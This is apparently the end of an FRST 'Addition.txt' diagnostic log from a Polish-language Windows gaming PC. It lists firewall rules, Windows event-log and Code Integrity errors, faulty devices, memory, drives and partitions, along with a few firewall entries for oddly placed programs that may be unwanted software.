User{BEACFE0E-3B2F-4AC7-B145-40D1109FF4EC}D:\program files (x86)\origin games\battlefield 4\bf4.exe] => (Allow) D:\program files (x86)\origin games\battlefield 4\bf4.exe FirewallRules: [{18469CA8-89FB-419A-8482-7073D59A59EC}] => (Allow) D:\Program Files (x86)\Steam\steamapps\common\Warframe\Warframe.exe FirewallRules: [{95A958E6-63D1-4402-BD62-7E1E20CC9B27}] => (Allow) D:\Program Files (x86)\Steam\steamapps\common\Warframe\Warframe.x64.exe FirewallRules: [{24141201-0F9B-4AFB-A2A7-94EB1105F8BF}] => (Allow) D:\Program Files (x86)\Steam\steamapps\common\Warframe\Warframe.exe FirewallRules: [{C0B3ACD8-1C85-4404-95E8-012FFE85CAAE}] => (Allow) D:\Program Files (x86)\Steam\steamapps\common\Warframe\Warframe.x64.exe FirewallRules: [{09120DCC-6D70-415A-8A80-30855261F43E}] => (Allow) D:\Program Files (x86)\Steam\steamapps\common\Warframe\Tools\Launcher.exe FirewallRules: [{F9F810F9-B1D7-4F44-9BB6-FF1CB0CAE335}] => (Allow) D:\Program Files (x86)\Steam\steamapps\common\Warframe\Tools\RemoteCrashSender.exe FirewallRules: [{71F953A6-6121-44BF-A5AD-0FBD646C3717}] => (Allow) D:\Program Files (x86)\Steam\steamapps\common\Warframe\Warframe.exe FirewallRules: [{D3528D17-4369-4726-9947-B778F069D356}] => (Allow) D:\Program Files (x86)\Steam\steamapps\common\Warframe\Warframe.x64.exe FirewallRules: [{3B4AAC4B-E38D-478C-979B-BEB9693A221E}] => (Allow) D:\Program Files (x86)\Steam\steamapps\common\Warframe\Warframe.exe FirewallRules: [{E58DE557-B660-41CD-8FF1-66221AD9AAB1}] => (Allow) D:\Program Files (x86)\Steam\steamapps\common\Warframe\Warframe.x64.exe FirewallRules: [{F4C3AAE5-C9A2-4844-8103-3DB9C288AEF1}] => (Allow) D:\Program Files (x86)\Steam\steamapps\common\Warframe\Tools\Launcher.exe FirewallRules: [{E656118E-9D6A-41FE-A1D2-0B721E80B6A5}] => (Allow) D:\Program Files (x86)\Steam\steamapps\common\Warframe\Tools\RemoteCrashSender.exe FirewallRules: [{19868386-C7D4-4B35-9D8B-467331994837}] => (Allow) D:\Program Files (x86)\Steam\steamapps\common\EvolveGame\bin64_SteamRetail\Evolve.exe FirewallRules: [{9D640420-6951-44A7-9FD2-1AF852292B4D}] => (Allow) D:\Program Files (x86)\Steam\steamapps\common\EvolveGame\bin64_SteamRetail\Evolve.exe FirewallRules: [TCP Query User{FB836BDC-16F3-479F-AED1-813ED9CCD3AB}D:\gry\igg-rimworld.alpha.14d\rimworldwin.exe] => (Allow) D:\gry\igg-rimworld.alpha.14d\rimworldwin.exe FirewallRules: [UDP Query User{34D35972-5E7C-4C0C-9C82-3A320C9A432E}D:\gry\igg-rimworld.alpha.14d\rimworldwin.exe] => (Allow) D:\gry\igg-rimworld.alpha.14d\rimworldwin.exe FirewallRules: [{71B9D47E-E884-4D5B-AE72-D7EA084B85D1}] => (Allow) D:\GRY\pokemony\Nox\bin\Nox.exe FirewallRules: [{D5404210-6056-4F8F-BD24-A7E3C3CC6261}] => (Allow) C:\Program Files\Bignox\BigNoxVM\RTNoxVMHandle.exe FirewallRules: [{28E61982-972F-4DCB-A274-207E2DDF4908}] => (Allow) C:\Program Files (x86)\Opera\43.0.2442.1144\opera.exe FirewallRules: [{2D9ED092-BB1D-4708-8A6A-3EB0516D44AC}] => (Allow) C:\Users\defaultuser0\AppData\Local\Temp\andy-x64\Setup.exe FirewallRules: [{7770C827-605E-44E4-8FB7-D86AD3171192}] => (Allow) C:\Users\defaultuser0\AppData\Local\Temp\andy-x64\Setup.exe FirewallRules: [{2D589EF8-1C05-49CB-8D7D-C23A672F0905}] => (Allow) C:\Program Files\Andy\andy.exe FirewallRules: [{52452F10-06FD-45A2-911D-8C0231292794}] => (Allow) C:\Program Files\Andy\andy.exe FirewallRules: [{98D9A29E-3535-41E9-B879-578DA5B2F0E0}] => (Allow) C:\Program Files\Andy\AndyConsole.exe FirewallRules: [{AA1ABC49-B86F-4D31-BD04-F91D9FE6FA19}] => (Allow) C:\Program Files\Andy\AndyConsole.exe FirewallRules: [{2E4D4D22-DAB6-429B-954E-2D6D2791CA10}] => (Allow) C:\Program Files\Andy\HandyAndy.exe FirewallRules: [{41AA9B5C-39D8-4A39-8A6B-E75A09205F53}] => (Allow) C:\Program Files\Andy\HandyAndy.exe FirewallRules: [{4A1CCA98-F75B-419E-A607-1899D6340A0E}] => (Allow) C:\Program Files\Andy\SetupFiles\Uninstall.exe FirewallRules: [{905056E9-9D97-473D-A098-2C7A2955F9E8}] => (Allow) C:\Program Files\Andy\SetupFiles\Uninstall.exe FirewallRules: [{BF57D1C1-139C-403D-B2CE-534EDAE4975B}] => (Allow) C:\Program Files\Andy\SetupFiles\VMwareCheck.exe FirewallRules: [{5264E4D2-D408-4E1F-A9BD-A025DEB13EAF}] => (Allow) C:\Program Files\Andy\SetupFiles\VMwareCheck.exe FirewallRules: [{39372A67-3F63-4C4C-ACE2-67280CB95553}] => (Allow) C:\Program Files\Andy\SetupFiles\AndyDoctor.exe FirewallRules: [{3D9F8B98-1F71-4768-9673-4BA749788E28}] => (Allow) C:\Program Files\Andy\SetupFiles\AndyDoctor.exe FirewallRules: [{C13E4372-E46A-4BD1-BF03-9DD845A0F091}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe FirewallRules: [{43AA615D-5085-4041-8DDA-0941BDE4687C}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe FirewallRules: [{677278A1-0C2D-4EEC-97AE-5C6CD24B12D1}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe FirewallRules: [{C613BAC2-AC68-4F2C-A7CE-02D2E9ECA47F}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe FirewallRules: [{07431582-0792-4EBC-B902-2D25ADC7EFFC}] => (Allow) D:\Program Files (x86)\Steam\steamapps\common\Grand Theft Auto V\GTA5.exe FirewallRules: [{50A319A7-B3A5-4E67-928D-0D589AAFA603}] => (Allow) D:\Program Files (x86)\Steam\steamapps\common\Grand Theft Auto V\GTA5.exe FirewallRules: [{C6BCBB4E-C5AF-4805-BD62-07E0D068D82E}] => (Allow) D:\Program Files (x86)\Steam\steamapps\common\Counter-Strike Global Offensive\csgo.exe FirewallRules: [{2302ED61-467A-4357-981A-7FDD2BCA0D49}] => (Allow) D:\Program Files (x86)\Steam\steamapps\common\Counter-Strike Global Offensive\csgo.exe FirewallRules: [{4EDA325C-B733-4B76-A2A0-70DEB9F580BF}] => (Allow) D:\Program Files (x86)\Steam\steamapps\common\Grand Theft Auto V\GTAVLauncher.exe FirewallRules: [{42924F47-A77B-497C-ADD4-9249360D18AF}] => (Allow) D:\Program Files (x86)\Steam\steamapps\common\Grand Theft Auto V\GTAVLauncher.exe FirewallRules: [{7788D050-CE91-42D4-94FD-62A0F39ED404}] => (Allow) D:\Program Files (x86)\Steam\steamapps\common\Super Meat Boy\SuperMeatBoy.exe FirewallRules: [{C56DF243-3B27-484E-ADE5-0F46ABDEBF3A}] => (Allow) D:\Program Files (x86)\Steam\steamapps\common\Super Meat Boy\SuperMeatBoy.exe FirewallRules: [TCP Query User{CDBE0FD2-8767-436E-9BEA-445A0AAAEB42}D:\program files (x86)\steam\steamapps\common\paladins\binaries\win32\paladins.exe] => (Allow) D:\program files (x86)\steam\steamapps\common\paladins\binaries\win32\paladins.exe FirewallRules: [UDP Query User{115F9A45-4517-48E9-8627-28F2A95D9B2D}D:\program files (x86)\steam\steamapps\common\paladins\binaries\win32\paladins.exe] => (Allow) D:\program files (x86)\steam\steamapps\common\paladins\binaries\win32\paladins.exe FirewallRules: [{B64D9575-F05C-45EF-9E62-7F591403F6C9}] => (Block) D:\program files (x86)\steam\steamapps\common\paladins\binaries\win32\paladins.exe FirewallRules: [{D879E7DD-97DD-416F-9466-59791CAAAF59}] => (Block) D:\program files (x86)\steam\steamapps\common\paladins\binaries\win32\paladins.exe FirewallRules: [TCP Query User{DE4A2BE0-EBB4-4A09-9562-6386A0DBAECB}F:\gry\far cry 3\bin\farcry3_d3d11.exe] => (Allow) F:\gry\far cry 3\bin\farcry3_d3d11.exe FirewallRules: [UDP Query User{CD379F9C-5D81-4950-AF6E-797E2176D042}F:\gry\far cry 3\bin\farcry3_d3d11.exe] => (Allow) F:\gry\far cry 3\bin\farcry3_d3d11.exe FirewallRules: [{06FFE517-66B0-4003-94CD-4689DF5A6292}] => (Block) F:\gry\far cry 3\bin\farcry3_d3d11.exe FirewallRules: [{C9C886F8-5D94-47C4-B3C7-1B826F0E99D1}] => (Block) F:\gry\far cry 3\bin\farcry3_d3d11.exe FirewallRules: [TCP Query User{2D9E0AAF-F0D9-4F4D-84B1-450AF6282223}F:\gry\far cry 3\bin\farcry3.exe] => (Allow) F:\gry\far cry 3\bin\farcry3.exe FirewallRules: [UDP Query User{CC35B4E6-487C-4F73-971C-013DFB63089B}F:\gry\far cry 3\bin\farcry3.exe] => (Allow) F:\gry\far cry 3\bin\farcry3.exe FirewallRules: [{B3BCC0F3-7A96-4099-8C55-9C66B4D50394}] => (Block) F:\gry\far cry 3\bin\farcry3.exe FirewallRules: [{4E4FEA6F-3E3A-4B33-8DD7-04846EEA6D38}] => (Block) F:\gry\far cry 3\bin\farcry3.exe FirewallRules: [{3A6809F4-1CBD-4559-8D90-C8A88A6261DC}] => (Allow) D:\Program Files (x86)\Tunngle\TnglCtrl.exe FirewallRules: [{82EB2E7F-7B46-44EE-BEEB-DC288B651B8A}] => (Allow) D:\Program Files (x86)\Tunngle\TnglCtrl.exe FirewallRules: [{47C072E6-E517-4FC3-89EE-C0519AF55AE0}] => (Allow) D:\Program Files (x86)\Tunngle\TnglCtrl.exe FirewallRules: [{671A61DB-5299-4790-9AE6-A67AA2C1A40B}] => (Allow) D:\Program Files (x86)\Tunngle\TnglCtrl.exe FirewallRules: [{C509CEF1-8FE9-4266-8D09-001785F5C103}] => (Allow) D:\Program Files (x86)\Tunngle\Tunngle.exe FirewallRules: [{6C124552-29F9-4AA3-8A1C-8F5CE3DA611C}] => (Allow) D:\Program Files (x86)\Tunngle\Tunngle.exe FirewallRules: [{E4C6D13D-8CF9-4A91-B953-52A52A8B527E}] => (Allow) D:\Program Files (x86)\Tunngle\Tunngle.exe FirewallRules: [{A9BF75E0-32DB-4185-B6A8-427DF6F493E1}] => (Allow) D:\Program Files (x86)\Tunngle\Tunngle.exe FirewallRules: [{C5B4BFF9-6BCE-45E7-96C7-54AB1AD88C53}] => (Allow) D:\GRY\Dont Starve Together\bin\dontstarve_steam.exe FirewallRules: [{10A594C1-907E-43A7-8FD8-501A97E8428D}] => (Allow) D:\GRY\Dont Starve Together\bin\dontstarve_steam.exe FirewallRules: [{A2A9156E-05D9-43C6-9193-0D3AE8BFF26F}] => (Allow) D:\GRY\Dont Starve Together\bin\dontstarve_steam.exe FirewallRules: [{B48A90AA-F3AB-4CF4-80B7-93FCDF85DB76}] => (Allow) D:\GRY\Dont Starve Together\bin\dontstarve_steam.exe FirewallRules: [{59DAEBFF-DE6C-40CE-BB9C-BDA2A2E9F79B}] => (Allow) D:\Program Files (x86)\Steam\steamapps\common\rocketleague\Binaries\Win32\RocketLeague.exe FirewallRules: [{CA1086DF-B519-4D9D-9F94-DD169175635B}] => (Allow) D:\Program Files (x86)\Steam\steamapps\common\rocketleague\Binaries\Win32\RocketLeague.exe FirewallRules: [{1CBC7677-43BC-4EFC-B195-D68DD39EDF9A}] => (Allow) D:\Program Files (x86)\Steam\steamapps\common\INSIDE\INSIDE.exe FirewallRules: [{70AFDF2D-4D8B-459B-A1C6-ECA3A4BE4660}] => (Allow) D:\Program Files (x86)\Steam\steamapps\common\INSIDE\INSIDE.exe FirewallRules: [TCP Query User{17A6AEA8-4823-4864-A1F2-DEFB5C95268B}D:\gry\overwatch\overwatch.exe] => (Allow) D:\gry\overwatch\overwatch.exe FirewallRules: [UDP Query User{2923B63F-E5E3-47EA-82AC-F85BA95BE4E7}D:\gry\overwatch\overwatch.exe] => (Allow) D:\gry\overwatch\overwatch.exe FirewallRules: [{A8424F53-6604-418B-9FDC-69C61E3A74E9}] => (Block) D:\gry\overwatch\overwatch.exe FirewallRules: [{C60150C2-2FB2-4F3C-9975-EA64F713947F}] => (Block) D:\gry\overwatch\overwatch.exe FirewallRules: [{0AD26B28-8EF7-4BFE-BD5E-D3D89822C408}] => (Allow) C:\Program Files (x86)\MIO\loader\st500dm002-1bd142_w3t830z0xxxxw3t830z0.dat FirewallRules: [{C941A94C-6E20-406A-BDA7-025D156F5CD9}] => (Allow) C:\Program Files (x86)\MIO\loader\st500dm002-1bd142_w3t830z0xxxxw3t830z0.dat FirewallRules: [{7F98B576-4A72-4F6A-ACDA-D3FF15490FA7}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe FirewallRules: [{58D4E0A2-3441-4BE3-8473-F1049D221198}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe FirewallRules: [{5B92CF55-1835-494E-938B-5D4BF2322936}] => (Allow) C:\Program Files (x86)\Dohat\Application\chrome.exe ==================== Restore Points ========================= ATTENTION: System Restore is disabled ==================== Faulty Device Manager Devices ============= Name: Standardowa klawiatura PS/2 Description: Standardowa klawiatura PS/2 Class Guid: {4d36e96b-e325-11ce-bfc1-08002be10318} Manufacturer: (Klawiatury standardowe) Service: i8042prt Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24) Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed. Devices stay in this state if they have been prepared for removal. After you remove the device, this error disappears.Remove the device, and this error should be resolved. Name: Mysz Microsoft PS/2 Description: Mysz Microsoft PS/2 Class Guid: {4d36e96f-e325-11ce-bfc1-08002be10318} Manufacturer: Microsoft Service: i8042prt Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24) Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed. Devices stay in this state if they have been prepared for removal. After you remove the device, this error disappears.Remove the device, and this error should be resolved. ==================== Event log errors: ========================= Application errors: ================== Error: (04/19/2017 04:04:20 PM) (Source: Microsoft-Windows-EFS) (EventID: 4401) (User: Sebastian-PC) Description: 7.488: usługa systemu szyfrowania plików nie mogła zainicjować obsługi użytkownika w funkcji EDP. Kod błędu: 0x80070005. Error: (04/19/2017 03:59:00 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: ) Description: Aktywacja licencji (slui.exe) nie powiodła się, kod błędu: hr=0xC004F074 Argumenty wiersza polecenia: RuleId=502ff3ba-669a-4674-bbb1-601f34a3b968;Action=AutoActivateSilent;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=NetworkAvailable Error: (04/19/2017 03:58:25 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: ) Description: Aktywacja licencji (slui.exe) nie powiodła się, kod błędu: hr=0xC004F074 Argumenty wiersza polecenia: RuleId=502ff3ba-669a-4674-bbb1-601f34a3b968;Action=AutoActivateSilent;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=UserLogon;SessionId=1 Error: (04/19/2017 03:58:21 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: ) Description: Aktywacja licencji (slui.exe) nie powiodła się, kod błędu: hr=0xC004F074 Argumenty wiersza polecenia: RuleId=502ff3ba-669a-4674-bbb1-601f34a3b968;Action=AutoActivateSilent;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=NetworkAvailable Error: (04/19/2017 01:26:48 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: ) Description: Aktywacja licencji (slui.exe) nie powiodła się, kod błędu: hr=0xC004F074 Argumenty wiersza polecenia: RuleId=502ff3ba-669a-4674-bbb1-601f34a3b968;Action=AutoActivateSilent;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=NetworkQuarantineRetry Error: (04/19/2017 01:26:18 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: ) Description: Aktywacja licencji (slui.exe) nie powiodła się, kod błędu: hr=0xC004F074 Argumenty wiersza polecenia: RuleId=502ff3ba-669a-4674-bbb1-601f34a3b968;Action=AutoActivateSilent;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=NetworkAvailable Error: (04/19/2017 01:26:13 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: ) Description: Aktywacja licencji (slui.exe) nie powiodła się, kod błędu: hr=0xC004F074 Argumenty wiersza polecenia: RuleId=502ff3ba-669a-4674-bbb1-601f34a3b968;Action=AutoActivateSilent;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=UserLogon;SessionId=3 Error: (04/19/2017 01:26:09 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: ) Description: Aktywacja licencji (slui.exe) nie powiodła się, kod błędu: hr=0xC004F074 Argumenty wiersza polecenia: RuleId=502ff3ba-669a-4674-bbb1-601f34a3b968;Action=AutoActivateSilent;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=NetworkAvailable Error: (04/19/2017 01:21:23 PM) (Source: Microsoft-Windows-EFS) (EventID: 4401) (User: Sebastian-PC) Description: 7.488: usługa systemu szyfrowania plików nie mogła zainicjować obsługi użytkownika w funkcji EDP. Kod błędu: 0x80070005. Error: (04/19/2017 11:23:54 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Sebastian-PC) Description: Aktywacja aplikacji Microsoft.BingWeather_8wekyb3d8bbwe!App nie powiodła się. Błąd: -2144927148. Więcej informacji można znaleźć w dzienniku Microsoft-Windows-TWinUI/Działa. System errors: ============= Error: (04/19/2017 04:01:39 PM) (Source: Service Control Manager) (EventID: 7023) (User: ) Description: Usługa Connected Devices Platform Service zakończyła działanie; wystąpił następujący błąd: Nieokreślony błąd. Error: (04/19/2017 04:00:58 PM) (Source: DCOM) (EventID: 10010) (User: Sebastian-PC) Description: Serwer {37998346-3765-45B1-8C66-AA88CA6B20B8} nie zarejestrował się w modelu DCOM w wymaganym czasie. Error: (04/19/2017 03:58:58 PM) (Source: Service Control Manager) (EventID: 7023) (User: ) Description: Usługa Connected Devices Platform Service zakończyła działanie; wystąpił następujący błąd: Nieokreślony błąd. Error: (04/19/2017 03:58:00 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY) Description: Zgodnie z ustawieniami uprawnienia application-specific nie jest udzielane uprawnienie Local Activation do aplikacji serwera COM z identyfikatorem klasy CLSID {8D8F4F83-3594-4F07-8369-FC3C3CAE4919} i identyfikatorem aplikacji APPID {F72671A9-012C-4725-9D2F-2A4D32D65169} użytkownikowi NT AUTHORITY\SYSTEM o identyfikatorze zabezpieczeń SID (S-1-5-18) z adresu LocalHost (Using LRPC) działającemu w kontenerze aplikacji o identyfikatorze SID Unavailable (Unavailable). To uprawnienie zabezpieczeń można modyfikować przy użyciu narzędzia administracyjnego Usługi składowe. Error: (04/19/2017 03:57:55 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Nie można uruchomić usługi Origin Web Helper Service z powodu następującego błędu: Usługa nie odpowiada na sygnał uruchomienia lub sygnał sterujący w oczekiwanym czasie. Error: (04/19/2017 03:57:55 PM) (Source: Service Control Manager) (EventID: 7009) (User: ) Description: Upłynął limit czasu (30000 ms) podczas oczekiwania na połączenie się z usługą Origin Web Helper Service. Error: (04/19/2017 03:57:23 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Nie można uruchomić usługi osppsvc z powodu następującego błędu: Nie można odnaleźć określonego pliku. Error: (04/19/2017 03:57:23 PM) (Source: Service Control Manager) (EventID: 7001) (User: ) Description: Usługa NetTcpActivator zależy od usługi NetTcpPortSharing, której nie można uruchomić z powodu następującego błędu: Nie można uruchomić określonej usługi, ponieważ jest ona wyłączona lub ponieważ nie są włączone skojarzone z nią urządzenia. Error: (04/19/2017 03:54:44 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY) Description: Zgodnie z ustawieniami uprawnienia application-specific nie jest udzielane uprawnienie Local Activation do aplikacji serwera COM z identyfikatorem klasy CLSID {D63B10C5-BB46-4990-A94F-E40B9D520160} i identyfikatorem aplikacji APPID {9CA88EE3-ACB7-47C8-AFC4-AB702511C276} użytkownikowi NT AUTHORITY\SYSTEM o identyfikatorze zabezpieczeń SID (S-1-5-18) z adresu LocalHost (Using LRPC) działającemu w kontenerze aplikacji o identyfikatorze SID Unavailable (Unavailable). To uprawnienie zabezpieczeń można modyfikować przy użyciu narzędzia administracyjnego Usługi składowe. Error: (04/19/2017 03:54:18 PM) (Source: Service Control Manager) (EventID: 7023) (User: ) Description: Usługa Connected Devices Platform Service zakończyła działanie; wystąpił następujący błąd: Nieokreślony błąd. CodeIntegrity: =================================== Date: 2017-04-19 11:20:08.158 Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files (x86)\AVG\Av\avgidsagenta.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements. Date: 2017-04-19 11:20:08.156 Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files (x86)\AVG\Av\avgidsagenta.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements. Date: 2017-04-19 11:19:21.086 Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files (x86)\AVG\Av\avgidsagenta.exe) attempted to load \Device\HarddiskVolume2\Windows\WinSxS\amd64_avg.vc140.crt_f92d94485545da78_14.0.24210.0_none_69fa0197d9b096ae\vcruntime140.dll that did not meet the Custom 3 / Antimalware signing level requirements. Date: 2017-04-19 11:19:17.589 Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files (x86)\AVG\Av\avgidsagenta.exe) attempted to load \Device\HarddiskVolume2\Windows\WinSxS\amd64_avg.vc140.crt_f92d94485545da78_14.0.24210.0_none_69fa0197d9b096ae\vcruntime140.dll that did not meet the Custom 3 / Antimalware signing level requirements. Date: 2017-04-19 11:18:56.292 Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files (x86)\AVG\Av\avgidsagenta.exe) attempted to load \Device\HarddiskVolume2\Windows\WinSxS\amd64_avg.vc140.crt_f92d94485545da78_14.0.24210.0_none_69fa0197d9b096ae\vcruntime140.dll that did not meet the Custom 3 / Antimalware signing level requirements. Date: 2017-04-19 11:18:51.852 Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files (x86)\AVG\Av\avgidsagenta.exe) attempted to load \Device\HarddiskVolume2\Windows\WinSxS\amd64_avg.vc140.crt_f92d94485545da78_14.0.24210.0_none_69fa0197d9b096ae\vcruntime140.dll that did not meet the Custom 3 / Antimalware signing level requirements. Date: 2017-04-19 11:18:51.544 Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files (x86)\AVG\Av\avgidsagenta.exe) attempted to load \Device\HarddiskVolume2\Windows\WinSxS\amd64_avg.vc140.crt_f92d94485545da78_14.0.24210.0_none_69fa0197d9b096ae\vcruntime140.dll that did not meet the Custom 3 / Antimalware signing level requirements. Date: 2017-04-19 11:18:51.170 Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files (x86)\AVG\Av\avgidsagenta.exe) attempted to load \Device\HarddiskVolume2\Windows\WinSxS\amd64_avg.vc140.crt_f92d94485545da78_14.0.24210.0_none_69fa0197d9b096ae\vcruntime140.dll that did not meet the Custom 3 / Antimalware signing level requirements. Date: 2017-04-19 11:18:29.597 Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files (x86)\AVG\Av\avgidsagenta.exe) attempted to load \Device\HarddiskVolume2\Windows\WinSxS\amd64_avg.vc140.crt_f92d94485545da78_14.0.24210.0_none_69fa0197d9b096ae\vcruntime140.dll that did not meet the Custom 3 / Antimalware signing level requirements. Date: 2017-04-18 18:12:11.175 Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files (x86)\AVG\Av\avgidsagenta.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements. ==================== Memory info =========================== Processor: Intel(R) Core(TM) i5-6400 CPU @ 2.70GHz Percentage of memory in use: 42% Total physical RAM: 8155.16 MB Available physical RAM: 4684.64 MB Total Virtual: 16347.16 MB Available Virtual: 12185.76 MB ==================== Drives ================================ Drive c: () (Fixed) (Total:97.12 GB) (Free:22.99 GB) NTFS Drive d: () (Fixed) (Total:368.1 GB) (Free:165.93 GB) NTFS Drive f: () (Fixed) (Total:407.16 GB) (Free:407 GB) NTFS Drive g: (New Volume) (Fixed) (Total:58.6 GB) (Free:58.49 GB) NTFS Drive h: () (Fixed) (Total:0.1 GB) (Free:0.03 GB) NTFS ==>[system with boot components (obtained from drive)] Drive i: (Dont Starve Together) (CDROM) (Total:0.39 GB) (Free:0 GB) UDF ==================== MBR & Partition Table ================== ======================================================== Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: 88A377C3) Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS) Partition 2: (Not Active) - (Size=97.1 GB) - (Type=07 NTFS) Partition 3: (Not Active) - (Size=450 MB) - (Type=27) Partition 4: (Not Active) - (Size=368.1 GB) - (Type=07 NTFS) ======================================================== Disk: 1 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: 20FD20FC) Partition 1: (Active) - (Size=407.2 GB) - (Type=07 NTFS) Partition 2: (Not Active) - (Size=58.6 GB) - (Type=OF Extended) ==================== End of Addition.txt ============================